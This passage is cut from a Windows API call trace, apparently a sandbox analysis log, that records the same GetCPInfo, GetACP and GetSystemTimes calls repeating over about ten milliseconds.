lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.995] GetACP () returned 0x4e4 [0043.995] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.996] GetACP () returned 0x4e4 [0043.996] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.997] GetACP () returned 0x4e4 [0043.997] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.998] GetACP () returned 0x4e4 [0043.998] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0043.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0043.999] GetACP () returned 0x4e4 [0043.999] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.000] GetACP () returned 0x4e4 [0044.000] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.001] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.001] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.002] GetACP () returned 0x4e4 [0044.002] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0044.003] GetACP () returned 0x4e4 [0044.003] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0044.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 